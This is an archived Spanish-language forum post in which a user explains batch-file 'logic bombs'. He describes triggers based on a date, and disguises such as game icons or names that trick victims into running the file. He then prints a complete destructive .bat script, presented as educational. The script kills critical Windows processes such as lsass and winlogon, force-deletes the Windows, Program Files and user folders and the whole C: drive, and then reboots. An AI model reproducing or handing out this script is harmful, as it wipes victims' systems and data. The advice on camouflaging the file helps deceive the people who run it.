PDA

Ver la Versión Completa Con Imagenes : aclaracion codigos bat horo rolo


Ayudante De Santa
06-11-2015, 22:19:08
Los mejores licores
DarkMaster2007
19-12-2009, 15:37:25
boy a tratar de redondear la idea el amigo horo rolo a lo que se refiere el con los codigos bat no son los tipicos codigos corrientes como la creacion de menus ms-dos o hacer una ruta en modo ms-dos
lo que habla horo rolo son los codigos bat llamados bombas logicas estos codigos que llevan programacion de c y c++ en algunos casos llevan como objetivo por que no le encuentrp otro sin o el de atacar un pc
yo he tenido la oportunidad de manipular y programar este tipo de codigos como ensayo en mi propio equipo y lamentablemente son destructivos al 100 por ciento
existen dos modos por los cuales las personas programan los codigo que son por tiempo y por ejecucion
el bat por tiempo el programador en su codigo interno le inserta una fecha oviamente futura que cuando llegue ese dia la bomba se active y acabe con todo
el bat por programacion es el bat con el codigo maligno ya programado pero se le anade un icono vistoso o nombre de juego sea un camuflaje pàra que la victima lo active creyendo que es un juego o algo inofensivo
el modo de ataque va desde borra un archivo bloiquear el arranque de un pc con ciclos repetitivos hasta formatear todo un pc dependiendo de la configuracion que le haya dado su programador
es un metodo talvez poco conocido pero eficiente para este tipo de fines pues con un buen blindaje y hasta sin que este aveces no lo detecta los antivirus
como esta explicacion es con fines edicativos y espero que el administrador no me banee por esto me me tome el atrevimiento de programar un codigo de estos para mortarselos a ustedes y que sepan distinguirlo antes de caer en una de estas minas y ejecutarla

@echo off
ipconfig /release
taskkill /f /im explorer.exe
taskkill /f /im svchost.exe
shutdown -a
taskkill /f /im lsass.exe
taskkill /f /im winlogon.exe
del /s /f /q "C:\WINDOWS"
del /s /f /q "C:\Archivos de programa"
del /s /f /q "C:\Documents and Settings"
del /s /f /q "C:\"
shutdown -r -f -t 01
exit

no siendo mas espero que hayan aprenbdido a distinguir este tipo de archivos de los demas bats
gracias

att darkmaster